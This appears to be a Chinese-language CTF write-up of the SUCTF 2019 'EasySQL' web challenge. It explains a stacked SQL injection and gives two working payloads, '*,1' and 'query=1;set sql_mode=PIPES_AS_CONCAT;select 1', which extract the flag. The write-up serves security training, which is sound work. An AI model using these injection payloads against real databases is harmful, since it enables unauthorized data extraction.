[原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)

简介

 原题复现:

 

 考察知识点:堆叠注入

 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题

简介

[原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)_第1张图片

测试发现有堆叠注入漏洞 

 [原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)_第2张图片

 

方法一:

看wp知道后端查询语句是这样的这时一种非预期解的方法:

 $sql = "select ".$post['query']."||flag from Flag";

所以我们前端构造语句 *,1  这样sql的语句就是这样的了

select *,1||flag from Flag

[原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)_第3张图片

 

方法二:

预期解通过堆叠注入将sql_mode的值设置为PIPES_AS_CONCAT,从而将 || 视为字符串的连接操作符而非或运算符,所以构造出来

payload:

query=1;set sql_mode=PIPES_AS_CONCAT;select 1

这样在进行查询的时候将||运算符当成连接符成这样的语句

select 1,flag from Flag

[原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)_第4张图片

参考学习:https://www.cnblogs.com/chrysanthemum/p/11729891.html

    https://www.jianshu.com/p/5644f7c39c68

 

你可能感兴趣的:([原题复现]SUCTF 2019 WEB EasySQL(堆叠注入))